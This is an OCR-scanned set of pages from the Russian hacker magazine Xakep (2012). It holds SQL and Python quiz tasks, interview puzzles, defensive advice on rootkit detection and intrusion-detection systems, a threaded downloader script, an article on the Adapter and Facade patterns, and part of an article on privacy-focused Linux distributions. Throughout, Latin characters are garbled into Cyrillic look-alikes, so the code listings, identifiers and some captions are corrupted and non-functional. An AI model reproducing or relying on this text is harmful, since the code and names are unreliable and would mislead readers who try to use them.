которые содержат информацию (наименование продукта и цена) о 
какой-нибудь абстрактной продукции: 

СКЕАТЕ ТАВІЕ 1;е5І:1(ргосІ ѴАКСНАК(ІѲ), ргісе ІІМТ); 

СКЕАТЕ ТАВІЕ 1;е5І;2(ргосІ ѴАКСНАК(ІѲ), ргісе ІІМТ); 

Для решения этой задачи нам нужно использовать один из опе- 
раторов семейства 10ІМ, которые позволяют объединять несколько 
колонок из разных таблиц в одну. В нашем случае использование 
ЕЕРТ 10ІМ обусловлено тем, что мы должны выбрать все записи из 
левой таблицы (первой), чтобы понять, какие из них отсутствуют в 
правой (второй). Условий объединения таблицу нас будет два — по 
количеству столбцов. Соответственно, для более сложных таблиц 
нужно перечислить все столбцы. В конце декларируем условие 
«ѴѴНЕРЕ ІезіЗ.ргосІ 15 N1111», которое означает, что нас интересу- 
юттолько записи, отсутствующие во второй таблице. При таком 
объединении они дают пустое значение: 

5Е1ЕСТ 1;е5І;1.* РКОМ 1;е5І;1 ІЕРТ 10ІМ іезІіЗ 

ОМ 1;е5І:1. ргосІ=1;е5І;2. ргосі АМО 1;е5І;1.ргісе=1;е5І:2. ргісе 

ІЛІНЕКЕ 1:651:2. ргосі 1$ МШІ; 

Если у нас в таблице есть уникальный идентификатор записи, то 
указывать его при запросе в условии для 10ІМ, в принципе, не надо, 
так кактовар и цена вполне могут быть одинаковыми, а идентифи- 
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ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ 



1. Написать функцию, которая будет получать на вход два списка 
и возвращатьсловарь, в котором ключи — элементы первого 
списка, а значения — элементы второго списка или Мопе, если 
соответствующий элемент отсутствует. 

>>> а = ["а" . "Ь" . "с"] 

>>> Ь = [1. 2] 

>>> ргіпі: сІіс1:і-Ру(а.Ь^ 

{"а": 1. "Ь": 2. "с": Мопе> 

2. Естьследующая функция: 

сіе-р тѵаррепсКа = []. пит = 0) : 

а.аррепсКпиш) 

ргіпі: а 

Определить, что будет происходить при выполнении следующего 
кода и почему: 

>>> а = [1.2.3] 

>>> тѵаррепсі(а) 

>>> шуаррепсІО 

>>> шѵаррепсІП 

>>> а = 11:2. 3:4> 

>>> туаррепс1(*а^ 

>>> тѵаррепсІ(**а) 

3. Написать класс, который хранит список своих экземпляров и по- 
зволяет итерировать по ним. 



>>> а = КеерегП 

>>> Ь = КеерегО 

>>> -Рог і іп Кеерег ЛІ5І:_іп5І:апсе5П : ргіпі і 
<Кеерег іпзіапсе аі 0х... 



4. Чтоэто и чтосэтим можносделать? 

389/1:ср ореп Ісіар (Апопутоиз ЬіпсІ ОК) 



каторы разными просто потому, что они были добавлены в таблицы 
в разном порядке или в разное время. 

УСЛОВИЕ 

Доказать, что полусумма двух последовательных простых чисел, 
начиная с трех, представляет собой составное число. 

РЕШЕНИЕ 

Понятие составного числа мы встречаем не каждый день, поэтому 
позволю себе напомнить определение: составное число — это на- 
туральное число больше единицы, которое не является простым. 
Рассмотрим закономерность: 

3 + 5 = 8 

5 + 7 = 12 

7 + 11 = 18 



Отсюда видно, что все простые числа нечетные, а два нечетных 
числа в сумме дают четное, поэтому полусумма простых чисел — 
это натуральное число, то есть дробной части оно не имеет. Теперь 
представим, где на числовой прямой расположена полусумма двух 



последовательных чисел. Правильно — между ними. Атак как мы 
рассматриваем только последовательные простые числа, то между 
ними ещё одного простого числа быть не может. Следовательно, 
полусумма двух последовательных простых чисел, начиная с трех, 
число составное. Что и требовалось доказать. 

УСЛОВИЕ 

Возникло подозрение, что один из твоих веб-серверов взломан. 
Необходимо: 

а. проверить систему на предмет руткитов, 

б. на будущее настроить уведомление администратора о малейшей 
подозрительной активности, возникающей на сервере или на- 
правленной на него. 

РЕШЕНИЕ 

Сперва следует определиться, что за ОС стоит на сервере. 

В случае, если сервер под *піх, я бы воспользовался такой 
программой, как сЬкгооІкіІ. Она не только проверяет систему на 
наличие руткитов, но и выявляет аномальную активность, напри- 
мер удаление записей из системных журналов. СЬкгооІкіІ есть 
в репозиториях большинства дистрибутивов, так что проблем с 
ее установкой возникнуть не должно. Ещё две альтернативные 
программы с похожим функционалом — это гкЬипІег и ипЫбе. Для 
винды существует гораздо больше ПО, обнаруживающего руткиты. 
Полный списоктаких программ смотри по ссылке Ыір://доо.дІ/9НХЕі . 
Из популярных могу порекомендовать 6МЕР или РооіРереаІ. Кроме 
того, если сервер находится в корпоративной среде, в ней наверня- 
ка централизованно развернуто ПО какого-либо антивирусного вен- 
дора, которое практически всегда имеет в своем арсенале модули 
для борьбы с руткитами. Решить задачу с уведомлением системного 
администратора о разнообразной подозрительной активности 
поможет специальное ПО под названием «система обнаружения 
вторжений» (Ю5 — іпігизіоп беіесііоп зузіет). В настоящее время 
существует целый класс таких систем. Нужно выбрать ту систему, 
которая подходит по требованиям. Для отдельно стоящего сервера 
я бы использовал классический 5пог1 или же более современную 
Вигісаіа. Это ПО с открытыми кодами, а следовательно, оно распро- 
страняется бесплатно. Для обнаружения подозрительных действий 
с веб-сервером используются файерволы уровня веб-приложения 
(ѴѴАР — ѵѵеЬ арріісаііоп ЛгеѵѵаІІ), которые могут быть встроены в 
конкретное приложение или представлять собой отдельное ПО. 

УСЛОВИЕ 

В центре идеально круглого озера плавает утка, а на берегу сидит 
лиса. Утке нужно улететь, но она может взлететь только с берега. 
Скорость лисы в четыре раза больше скорости утки. Лиса хочет 
съесть утку, но не умеет плавать. Сможет ли утка спастись от лисы? 

РЕШЕНИЕІ 

Персонажи в задаче могут варьироваться (вместо лисы — орк, а 
вместо утки — хоббит в лодке и т. д.), но смысл остается тот же. Ещё 
добавлю, что речь идет о максимальной скорости лисы, но она с 
успехом может двигаться с меньшей скоростью или вообще ждать, 
иными словами, она Идеально Логичное Существо. 

Для решения задачи нам нужно вспомнить формулу длины 
окружности, ведь именно по ней будет бегать лиса: I = 2 * рі * Р, где 
Р — радиус окружности. Очевидно, что для получения максималь- 
ной форы утке необходимо стартовать в противоположную от лисы 
сторону. В таком случае утке нужно будет проплыть расстояние Р, 
а лисе пробежать 1/2, то есть рі * Р. Скорость лисы в четыре раза 
больше скорости утки, но расстояние, которое ей нужно преодолеть, 
всего лишь в 3,14 раза больше, чем расстояние, которое нужно про- 
плыть утке, поэтому лиса раньше окажется в том месте, куда должна 
попасть утка. Следовательно, утке не суждено улететь. Казалось 
бы, всё достаточно просто, но не тут-то было! Это я понял, когда на 
собеседовании мне задали вопрос: «А существует ли стратегия, по- 
зволяющая утке в конце концов доплыть до берега и улететь?» 
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Задачи на собеседованиях 



Да, такая стратегия существует, и вот в чем она заключается. 

Для простоты предположим, что радиус озера четыре метра. Первое, 
что нужно сделать утке, — это выплыть на окружность с радиусом в 
четыре раза меньше исходной (а если быть совсем точным, с радиу- 
сом г < 3/рі * Р/4) и с центром в той же точке таким образом, чтобы 
оказаться на максимальном удалении от лисы. Утка, центр озера и 
лиса должны находиться на одной прямой. Утке удастся это сделать, 
так как ее угловая скорость при движении по окружности с радиу- 
сом Р/4 будет выше, чем у лисы. Стало быть, утке до берега оста- 
нется только три метра, а лисе необходимо будет пробежать всё те 
же 1/2, то есть 12,56 метра (2 * 3,14 * 4/2). Расстояние, которое нужно 
преодолеть лисе, уже более чем в четыре раза превышает путь утки, 
а следовательно, утка спасена! В общем случае утке нужно выплыть 
на окружность радиусом г < 3/рі * Р/4 метра так, чтобы лиса, центр 
окружности и утка оказались на одной прямой. А дальше двигаться 
по кратчайшему пути к берегу! 

Р. 5. Дополнительное задание для гурманов: 

1 . Каким образом можно максимизировать отрыв утки от лисы? 

2 . При каком соотношении скоростей лиса гарантированно поймает 
утку? 

УСЛОВИЕІ 

Написать скрипт, считывающий список ІІРІ из файла (одна строка 
— один УРІ), скачивающий их не более чем в N потоков и сохраняю- 
щий каждую страницу в отдельном файле. М, задаваемое аргумен- 
том командной строки, по умолчанию равно 10. Имена конечных 
файлов значения не имеют. Для реализации многопоточности 
использовать на выбор одну из стандартных библиотек іЬгеасІіпд, 
еѵепОеУ деѵепі, Тѵѵізіесі или любую другую знакомую тебе библио- 
теку. 

РЕШЕНИЕ 

Я не стал особо выпендриваться и реализовал скрипт с использова- 
нием стандартной іЬгеасІіпд: 

ітрогі; 5у5 

ітрогі: Іііігеасііп^ 

ішрогі: Оиеие 

ітрогі; иг11іЬ2 



# Класс потока^ скачивающий страницу 
с1а55 РоыпІоасІТІігеасК'ІіІі геасІ іп^.ТІігеасІ') : 

сіе-р гип/зеі-р): 

# Прописываем хидеры для запроса 

беасІегБ = { 'Цзег-А^епі; ' : 

'Мо2І11а/4.0 (с отраііЫе; М5ІЕ 7.0; Ілі іпсіоыз N7 6.0)'} 

ыбііе игІзРооІ.дзіі еП > 0: 

Ір^біе = ореп( 5І:г(игІ5Роо1.д5І2еО) . 



# Запрашиваем содержимое страницы 

гед = иг11і Ь2.Кедие5І:(игІ5Роо1.§е1:0 .М опе.ІіеасІегБ^ 

# Пишем в отдельный файл 

1о?б1е.ыгі1:е(и г11іЬ2.иг1ореп(гед) .геасІП) 

1о§б1е. сІозеО 



# Выдаем справку, если скрипт запущен без аргументов 

і-р 1еп(5Ѵ5.аг^ѵ) < 2: 

ргіпі 'Цза^е: сіоыпіоасіег . рѵ [-п <питЬег>] РІІЕ\п\ 

"-П <питЬег>" - питЬ ег о-р 1іІігеасІ5 (сІе-Раи11: 10) ' 

5у5.ехі1;(1) 



# Обрабатываем возможный аргумент с количеством потоков 

і-р 1еп(5у5_^,аг§ѵ) == 4 апсі 5у5^г§ѵ[1]_== -п ' : 

іРігеасІз = Іп1;(5у5.аг§ѵ[2]^ 

еІ5е: 

1іІігеасІ5 = 10 



# Формируем очередь ІІКІ 

ЦГІ5РООІ = Оиеие. Оиеие(0) 

# Кладем ІІКІ'ы в очередь 

■Рог игі іп ореп(5у5.аг§ѵ[-1] ^ 'г'): 

цгібРооі. риіРигІ) 

# Запускаем потоки 

-Рог X іп хгап§е(1іІігеасІ5) : 

Ооып1оасІТІігеасІ() .5І;аг1;() 

игІ5Рі1е.сІ05еП 

УСЛОВИЕ 

Есть две изолированные друг от друга комнаты. В одной находятся 
три лампочки, в другой — три выключателя. Ты стоишь в комнате с 
выключателями и можешь перейти в комнату с лампочками только 
один раз. Необходимо определить, какая лампочка каким выключа- 
телем включается. 



РЕШЕНИЕ 

Наверное, про эту задачку слышали если не все, то многие. Реша- 
ется она достаточно просто (если вспомнить, что горящие лампочки 
имеют свойство нагреваться): 

1 . Включаем один из выключателей (допустим, первый). 

2 . Ждем некоторое время, пока поверхностьлампочки нагреется. 

3 . Выключаем этулампочку. 

4 . Включаем второй выключательи идем в другую комнатусмотреть 
на лампочки. 

Итого имеем: за ту лампочку, которая горит, отвечает только что 
включенный выключатель (второй). Трогаем выключенные лампоч- 
ки. Теплая лампочка включается с помощью первого выключателя. 

А та, которая не горит и холодная, — с помощью третьего. 

УСЛОВИЕ 

В одной бутылке литр вина, в другой литр воды. Из первой во вторую 
перелили ложку вина, а затем из второй в первую перелили ложку 
получившейся смеси. Чего теперь больше: воды в бутылке с вином 
или вина в бутылке с водой? Вино и воду не перемешивали. 

РЕШЕНИЕ 

Для большей наглядности возьмем ложку вместимостью 100 мл. По- 
сле первого переливания имеем: 

I бутылка: 900 мл вина 

II бутылка: 1000 мл воды + 100 мл вина 

После второго переливания: 

I бутылка: 900 мл вина + 100 мл смеси 

II бутылка: 1000 мл воды + 100 мл вина - 100мл смеси 

Получается, что в смеси 10 частей воды и 1 часть вина или же 
100/11 мл вина и 1000/11 мл воды. С учетом этого перепишем послед- 
нее выражение (позволю себе убрать «мл» для большей компакт- 
ности): 

I бутылка: (900 + 100/11) вина + 1000/11 воды 

II бутылка: (1000 - 1000/11) воды + (100 - 10/11) вина 

Посчитаем дроби: 

I бутылка: 909^09 вина + 90^91 воды 

II бутылка: 909^09 вина + 90^91 воды 

Как видно, смесь в бутылках одинаковая! Но это можно было 
понять и гораздо проще: подумай, ведь объем жидкости в бутылках 
в итоге остался одинаковым — один литр, а значит, и сами смеси 
должны быть одинаковыми. ^ 
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МЕНЯЕМ 
ИНТЕРФЕЙСЫ 
КЛАССОВ БЕЗ УЩЕРБА 
ДЛЯ ЗДОРОВЬЯ 

Разработка и поддержка большинства систем 
ведется в течение многих лет. Кодовая база 
растет как на дрожжах, а взаимосвязи между 
компонентами программного обеспечения 
становятся всё сложнее и изощреннее. Зачастую 
при обновлении отдельных участков кода перед 
программистами встает проблема рефакторинга 
всего проекта целиком. Для того чтобы этого 
избежать, создан паттерн «Адаптер», о котором 
мы сегодня и поговорим. 



авай представим, что несколько лет назад мы написали 

Д некий парсер, который собирает определенную инфор- 
_ мацию с нужных сайтов. Для парсинга НТМІ-страниц 
мы использовали стороннюю библиотеку, которая тогда отлично 
справлялась со своими задачами. Но вот прошло некоторое время, 
и старый заказчик, для которого мы создали наш чудо-продукт, ре- 
шил напомнить о себе и попросил добавить парочку-другую новых 
функций. Мы с задором взялись за работу, но буквально сразу по- 
няли, что библиотека для разбора НТМІ-кода уже давно устарела 
и не поддерживается. Зато в открытом доступе есть аналог с кучей 
свистелок и блестяшек, который к тому же работает быстрее и ста- 
бильнее. Но есть одна проблема — интерфейсы у классов новой 
библиотеки полностью отличаются от тех, которые мы использо- 
вали ранее. Более того, некоторые методы старого НТМІ-движка 
не имеют аналогов в новом. Нет, сделать что-то подобное можно, 
но для этого нужно вызвать несколько функций и правильно 
обработать результат их работы. Всё это наводит на мысль, что 
добавить пару новых фич будет не так просто, как нам это показа- 
лось вначале. Однако, так как мы проектировали наше приложение 
в 00-стиле, нам на помощь придет паттерн «Адаптер», который 
избавит нас от переписывания кучи старого кода. 

ПАТТЕРН «АДАПТЕР» 

Чтобы понять, как работает наш спасительный паттерн, до- 
статочно представить какой-нибудь переходник, например, для 
электроприборов из США, который позволяет воткнуть штатовскую 
вилку в европейскую розетку. Программный адаптер делает при- 



100 



ХАКЕР 03/158/2012 









Паттерны «Адаптер» и «Фасад: 



мерно то же. А если конкретнее, то он преобразует один интерфейс 
вызова в другой. Единственная его цель — сделать так, чтобы 
клиент не заметил, что он обращается совсем к другой библиоте- 
ке, и тем самым избежать трудоемкой и в какой-то степени даже 
опасной процедуры изменения кода. 

Для начала давай взглянем на то, что у нас было раньше. 

Наша программа в первой версии 

(используется устаревшая библиотека для парсинга НТМІ) 

// Интерфейс парсера _ 

сІазБ ІНТМІРагзег 

1 

// ... 

сбаг* ^еІіТа^зП = 0; 

// .. . 

і 

// Класс, реализующий интерфейс 

с1а55 НТМІРагзег : риЫіс ІНТМІРагзег 

і 

// ... 

сбаг* ^еІіТа^зП { 

// Реа лизация метода 



// ... 

} 

// Клиентский код 

ІНТМІРагзег *раг5ег^ = пеы НТМІРагзегП; 

раг5ег->^е1:Та^5(’) : 

Как мы видим, тут всё довольно просто. Есть некий класс 
НТМЕРагзег, реализующий соответствующий интерфейс. Клиент- 
ский код создает объект, который поддерживает этот интерфейс, 
а затем обращается к его разнообразным методам. Но теперь 
у нас есть МосІегпНТМЕРагзег, который никак не поддерживает 
ІНТМЕРагзег. Для того чтобы исправить этот недочет, мы создадим 
класс, который будет поддерживать ІНТМЕРагзег, при этом делеги- 
руя выполнение его методов новой библиотеке. Этот новый класс 
и станет адаптером. 

Адаптер для МосІегпНТМІРагзег 

МосІегпНТМІРагзег 

{ 

// ... 

5ІІСІ : : ѵес1:ог<сІіаг*> ^е1:Н1:т1Та^5П ; 

// ... 

} 



// Адапт ер, реализующий интерфейс ІНТНІРагзег 
сІазБ НТМІАсІарІіег (МосІегпНТМІРагзег &раг5ег): 



рцЫіс ІНТМІРагзег 

і 

ргіѵаііе: 

МосІегпНТ МІРагзег &т_тосІегпРаг5ег; 

риЫіс : 

НТМІАйаріег(МосІегпНТМІРаг5ег &раг5ег) 

{ 

ш шосІегпРагзег = рагзег; 

} 

сбаг* ^еІіТа^зП { 

// ... 

т шосІегпРагБег ,^е1:Н1:т1Та^5П ; 

// ... 

Ь 

// ... 

} 



// Клиентский код 

МосІегпНТМІРагзег &тосІегпРаг5ег = пеы Мос ІегпНТМІРагБег П : 
ІНТМІРагзег *раг5ег .= пеы НТМІАсІарІіег (шосІегпРагБег^ ; 
раг5ег->^е1:Та^5(’) : 

Клиентский код не претерпит практически никаких изменений. 
Ну, разве что придется создать объект класса НТМЕАсІарІег и пере- 
дать ему в качестве параметра ссылку на МосІегпНТМЕРагзег. 
Используя композицию, то есть передавая объект адаптируемого 
класса по ссылке, мы повышаем общую гибкость системы. 

В общем случае код адаптера может модифицировать результа- 
ты, получаемые от адаптируемого класса. Так, если, например, ме- 
тод деіТадзО класса НТМЕРагзег возвращает массив НТМЕ-тегов, 
используемых в разметке страницы, а метод деіНітІТадзО класса 
МосІегпНТМЕРагзег возвращает то же самое, но в виде вектора, то 
реализация метода деіТадз в НТМЕАбарІег создаст массив на осно- 
ве полученного от новой библиотеки вектора. 

Изменение результатов работы адаптируемого класса 

сіазз НТМЕАсІарІіег (МосІегпНТМЕРагзег &рагзег) : 

риЫіс ІНТМЕРагзег 

і 

ргіѵаіе: 

МосІегпНТМЕРагз ег &т_тосІегпРаг5ег; 

риЫіс : 

НТМЕАсІарІіег (МосІегпНТМЕРагзег &рагзег) 

{ 

т_тосІегпРагзег = рагзег; 

} 

сбаг* ^еіТа^зП I 

_ // ... 

уесіогР-РТа^з = т_тосІегпРагзег.^е1:Н1:пі1Та^зП ; 




Диаграмма классов паттерна «Адаптер» 
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// Преобразуем вектор в массив 
геііигп ѵес1;ог2аггау(ѵес1;огО-РТа§5Хі 

^ 



} 

Если ты регулярно заглядываешь в рубрику «Кодинг», то, на- 
верное, помнишь другой похожий паттерн, а именно «Декоратор». 
На первый взгляд действительно может показаться, что по сути 
эти два шаблона объектно-ориентированного программирования 
идентичны. Но на самом деле паттерн «Адаптер» служит для пре- 
образования одного интерфейса вызова в другой, в то время как 
«Декоратор» призван модифицировать результаты, выдаваемые 
методами поддерживаемых классов. 

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ 

Выше мы рассмотрели так называемый адаптер объектов, который 
адаптирует интерфейс путем композиции соответствующего объ- 
екта и передачи ему нужных вызовов. Но есть еще один вид такого 
паттерна — это адаптер классов. В отличие от адаптера объектов, 
адаптер классов использует множественное наследование, что 
немного упрощает его реализацию и ускоряет работу. 

Адаптер классов 

с1а55 НТМІАсІарІіег П: 

риЫіс НТМ1Раг5ег. риЫіс Мос1егпНТМ1Раг5ег 

і 

риЫіс : 



і»ііч 

Г 

■ІАІІс ѵаікі Ніь 1 п-|;| 

I 

, СМ (О іГЛірРйГ ж 

т&г-ігеъ игзЕБ - АЛчиЕЦ: 

иі ІСГ тяст 

! 

З^іЫІС ѴІгкнаІ 1 ЛЗІ 1 І |^ 4 М|ІМ-ІГ. I : 

сни-віі.ТЕіиііЕіл{'Шіс4і Тйі4вс Пйфіі ібп ”*} ; 



сійи А4лриЕ I Тид«с. 
ргіта'Іі! « асш 

йѵеггг# ѴВІ4 

^ ~~~ ^ оііиг нагл 
-іпй ГЬп «і-11 
«4ч^нс- ;і р 






Пример кода паттерна «Адаптер» на С# 



сбаг* деіТа^зП I 

// Тут всё проще, так как мы наследуем метод ^еіШіт ІТ а§5 ( ) ^ 

// то можно вызвать его напрямую 

ѵес1:огО -РТа§5 = §е1:Н1;т1Та§5() ; 

// Преобразуем вектор в массив 

геіигп ѵес1:ог2аггау(ѵес1:огО-РТа §5) : 

Ь - 

П ^ 

} 

Конечно, используя наследование вместо композиции, мы теря- 
ем некоторую гибкость и ограничиваем себя лишь одним классом 
НТМІРагзег, но взамен получаем выигрыш в производительности. 
Если бы программа создавала множество объектов НТМЕАсІарІег 
и интенсивно работала с его методами, то, используя адаптер объ- 
ектов, мы бы тратили лишнюю память и теряли время при вызове 
его методов и сохранении инкапсулированного НТМІРагзег. С дру- 
гой стороны, если бы у нас был некий класс НТМЕРагзег2, который 
бы также реализовывал интерфейс ІНТМЕРагзег, нам пришлось бы 
писать для него новый код. 



«ФАСАД» 

Теперь, когда мы хорошо разобрались в паттерне «Адаптер», 
можно заняться другим шаблоном объектно-ориентированного 
программирования под названием «Фасад». Технически «Фасад» 
мало чем отличается от «Адаптера». Чтобы в этом убедиться, давай 
взглянем на код. 

Паттерн «Фас ад» 

сіазз БузіешСІазз! 

{ 

ѵоісі шеіІіосІАО : 

// ... 

1 



сіазз $уз1:етС1а55 2 

і 

ѴОІСІ те1:ІіосІВ( V. 

// ... 

} 



сіазз ЗузіешСІазз 3 

і 

ѴОІСІ шеіІіосІСП ; 





Расасіе (БузіетСІаззІ &зс1^ 

5уз1:епіС1азз2 &зс2. БузіетСІаззЗ &зсЗ^ 

ргіѵаііе: 

БузІіетСІазз І &т_зс1; 

$уз1:етС1азз 2 &т_зс2; 

БузІіет СІаззЗ &т_зсЗ; 



риЫіс : 

Расасіе (Бузі ешСІазз! &зс1^ 

5узіетС1азз2 &зс2^ БузіешСІаззЗ &зсЗ) 

{ 

ШЗСІ = ЗСІ: 

т_зс2 = зс2: 

тзсЗ = зсЗ; 

} 



шеіІіосІО 

{ 

т зсІ.шеІіІіосІАО : 
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Паттерны «Адаптер» и «Фасад: 



г — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 1 




Диаграмма классов паттерна «Фасад» 



т_5с2.те1:ІіосІВП ; 

т_5с3.те1:ІіосІСП ; 

} 

} 

Класс Расасіе, так же как и НТМІАсІарІег, принимает в каче- 
стве параметров своего конструктора ссылки на объекты. Только, 
в отличие от «Адаптера», этих ссылок несколько. Далее «Фасад» 
определяет несколько методов, которые обращаются к функциям 
инкапсулированных объектов. Всё просто и очень похоже на пат- 
терн «Адаптер». Но цели у этих двух шаблонов совершенно разные. 
Если НТМІРагзег предназначен для приведения одного интерфей- 
са к другому, то Расасіе упрощает интерфейс доступа к некоторой 
системе классов. В приведенном выше примере мы инкапсулируем 
сразу несколько объектов, принадлежащих к разным типам и со- 
ставляющих некий набор классов, который служит для выполне- 
ния каких-либо определенных действий. Чтобы лучше себе это 
представить, достаточно вспомнить старый добрый ПК с систем- 
ным блоком, монитором, колонками и прочей периферией. Для 
запуска этого компьютера нам нужно нажать кнопку питания на си- 
стемном блоке, включить монитор, колонки и т. д., то есть вызвать 
множество функций классов, которые вместе образуют некую си- 



стему. «Фасад» же инкапсулирует все эти действия в одном своем 
методе, что сводит всю процедуру к вызову одной-единственной 
функции и тем самым упрощает клиенту жизнь. Если проводить 
аналогию с ПК, то «Фасад» — это кнопка включения ноутбука. 

Более того, паттерн «Фасад» позволяет клиенту обращаться 
к любому классу системы напрямую, на низком уровне, благода- 
ря чему сохраняется вся гибкость и мощь этих классов. Одна- 
ко, если клиент знает только интерфейс «Фасада», в будущем 
мы можем модифицировать систему классов, обслуживаемых 
Расасіе, и при этом не менять код клиента. Такая изоляция очень 
полезна. 



ЗАКЛЮЧЕНИЕ 

Мы узнали о двух новых паттернах: «Адаптере» и «Фаса- 
де». Первый позволяет безболезненно привести интерфейс 
одного класса к интерфейсу другого для быстрой адаптации 
клиентского кода к новым компонентам системы. Шаблон 
00-программирования «Фасад», очень похожий на «Адаптер», 
служит для совершенно другой цели — упрощения доступа 
к определенным интерфейсам. 

В мире объектного кодинга существует еще много разнообраз- 
ных паттернов, о которых я расскажу в будущем. ^ 
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Евгений Зобнин (ехесЬіі.ги) 




СВОБОДА 

через 
изоляцию 

ИЗ ЧЕГО СОСТОЯТ 
БЕЗОПАСНЫЕ ЫНОХ- 
ДИСТРИБУТИВЫ 

Когда речь заходит о создании операционки, 
способной обеспечить анонимность пребывания 
в Сети, безопасность сохраненных на диске 
данных и предоставить прочие средства 
защиты, дистрибутивостроители оказываются 
на удивление плодовитыми на идеи 
и неординарные решения парнями. Этим 
разработкам, простым и сложным, гениальным 
и спорным, и посвящена данная статья. 



Во время каждой 
загрузки Наѵеп 
проверяет 
«возраст» 
дистрибутива 
в днях, прошедших 
с момента 
установки. 
Разработчики 
не рекомендуют 
использовать 
дистрибутив, 
возраст которого 
достиг 200 дней. 



Разработчики 
безопасных 
дистрибутивов 
избегают 
использовать 
ТгиеСгур1,так как 
его разработка 
ведется на базе 
закрытой модели, 
из-за чего провести 
всесторонний аудит 

1/^Л П ^ Ы А 13 АА /ЧМ/ І-І/Ч 



ВВЕДЕНИЕ 



Многие хакеры, считающие себя эксперта- 
ми в безопасности всего и вся, в свое время 
бралисьза создание по-настоящему защищен- 
ных и предлагающих полную анонимность ОС. 
Многие из них потерпели фиаско, однако не- 
которые действительно показали миру, на что 
способны. Не будем делать навевающий тоску 
традиционный обзор дистрибутивов, а скон- 
центрируемся на самых главных технологиях 
в их арсенале, которые надежно защищают эти 



дистрибутивы от взломщиков, одновременно 
позволяя сохранить удобство и простоту в ис- 
пользовании. Чтобы не запутать читателя, я 
разбил эти технологии на пять групп: 

• Ядерные дела, а точнее патчи и различные 
заплатки, по умолчанию наложенные на кер- 
нел. 

• Защита данных. Описание способов, с по- 
мощью которых достигается безопасность 
сохраненной на диске/флешке информации. 

• Анонимизация. Набортехнологий, исполь- 



зуемыхдля обезличивания пользователя 
и запутывания тех, кто пытается его найти. 

• Десктоп. Набордоступныхприложений, 
атакже методики, применяемые для защиты 
от посторонних наблюдателей. 

• Различные интересные фишки. 

Итак, окунемся в мир параноидальной 
секьюрности и рассмотрим следующие дис- 
трибутивы: ІІЬипІи Ргіѵасу Ретіх, Ргіѵаііх, ТЬе 
Наѵеп Рго]'есІ, Таііз и ЫЬегІе Ыпих. 
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Свобода через изоляцию 



ЯДРЕНЫЙ ТУКС 



Чтобы сделать туке по-настоящему безопас- 
ной ОСью, не обойтись без допиливания ядра, 
а точнее, его патчинга для повышения общей 
стойкости ОС. Один из традиционных методов, 
используемых для достижения этой цели, 
заключается в наложении на ядро патчей 
проекта дгзесигііу. Они обеспечивают защиту 
от возможных вторжений с помощью множе- 
ства методов, среди которых запрет перехода 
по ссылкам, не принадлежащим пользовате- 
лю, запрет чтения сітезд для всех, кто не име- 
ет прав гооС дополнительные ограничения для 
сЬгооІ-приложений, запрет чтения 
/ргос, рандомизация адресного пространства 
и стека ядра и многое другое. Мы уже писали 
о дгзесигііу (статья «Термоядерный синтез», 
опубликованная в октябрьском номере за 2010 
год), так что не буду повторяться. 

Обычно вместе с дгзесигііу в систему 
устанавливается еще и РаХ, который ограни- 
чивает доступ к страницам памяти процессов 
(например, делает сегмент данных недоступ- 
ным для исполнения), что позволяет защитить 
системные процессы от многих ошибок пере- 
полнения буфера. Этот подход используется 
в ЫЬегІе Ыпих, который построен на основе 
ядра НагсІепесІ бепіоо, уже включающему 
в себя оба патча. 

Другой подход заключается в использова- 
нии системы ЗЕЫпих или АррАгтог совместно 
с двумя упомянутыми ранее патчами (или 
вместо них, но это глупость). Эти системы 
принудительного контроля доступа позволя- 
ютзапускать приложения в изолированном 
окружении, так что сбой (читай взлом) одного 
из них не повлечет за собой проблем в других. 
Подход с использованием АррАгтог реализо- 
ван в операционке диапШЭ, которая, по за- 
явлениям ее создателей, гарантирует полную 
изоляцию приложений друг от друга. 

Еще более радикальный поход заключается 
в применении гипервизоров для запуска каж- 



дого приложения на отдельной виртуальной 
машине. Смысл такого перегруза заключается 
в тотальном разделении приложений, так что 
даже если взломщику каким-то чудом удастся 
повысить свои привилегии до суперпользо- 
вателя и загрузить в ядро свой код, уязвимым 
будет только одно приложение, так как каждая 
виртуальная машина работает под управлени- 
ем собственного ядра. Такой зубодробитель- 
ный способ защиты используется в дистри- 
бутиве ОиЬезОЗ, которому в нашем журнале 
была посвящена отдельная статья («Младенец 
с лицом убийцы», ][_07_2010). 



НЕДОСЯГАЕМЫЕ БАЙТЫ 



Защищенность личных данных пользовате- 
ля — это вторая важная особенность лю- 
бой безопасной ОС. Многие дистрибутивы, 
предназначенные для анонимизации юзера 
в Сети, обеспечивают ее с помощью спосо- 
ба, который хирург из известного анекдота 
назвал бы ампутацией ненужного органа. 
Такие дистрибутивы распространяются в виде 
ЫѵеСО, который, даже будучи установленным 
на флешку, сохраняет все данные пользова- 
теля на РАМ-диске, уничтожаемом во время 
перезагрузки. Способ, конечно, действенный, 
но слишком топорный. 

Более интересный вариант состоит в ис- 
пользовании шифрованного хранилища 
на базе ТгиеСгурІ или ЕСІКБ/сІт-сгурС которое 
расшифровывается во время загрузки после 
ввода пароля. Благодаря современным на- 
работкам реализовать такую систему очень 
просто, тем более что она в готовом виде 
присутствует в дистрибутивах СІЬипІи, Ребога 
и многих других. Она также имеется в дис- 
трибутивах Таііз (ТЬе Атпезіас Іпсодпііо Ыѵе 
Бузіет) и ЫЬегІе Ыпих, причем в последнем 
в качестве хранилища используется крипто- 
ванный образ диска, находящийся в отдель- 
ном каталоге. По мере записи в него личных 




Процесс загрузки ІіЬегІе 

данных пользователя образ растет, но его 
в любой момент можно удалить, в результате 
чего система вернется к исходному послеуста- 
новочному состоянию. 

Многие системы также включают в себя на- 
бор инструментов для создания зашифрован- 
ных файлов и каталогов. Чаще всего для этого 
используется известный инструмент ТгиеСгурІ 
судебным графическим интерфейсом. Напри- 
мер, он входит в Наѵеп ( ѵѵѵѵѵѵ.Ьаѵеп-рго]есЕога ). 
Однако иногда разработчики дистрибутивов 
прибегают к более изощренным решени- 
ям. Дистрибутив Ргіѵабх включает в себя 
инструмент шифрования съемных носителей 
ОзЬСгуріРогтаІ и утилиту для резервного 
копирования шифрованных томов СгуріВаскир 
собственной разработки. В плане поддержки 
прозрачного шифрования данных особенно 
примечателен дистрибутив ІІЬипІи Ргіѵасу 
Ретіх (ѵѵѵѵѵѵ.ргіѵасѵ-сб.ога ). созданный для 
работы в локальном окружении, без доступа 
к сети (задействование ЕАМ/ѴѴЕАМ/ВІиеІооіЬ 
запрещено). В его арсенале имеется фронт-энд 
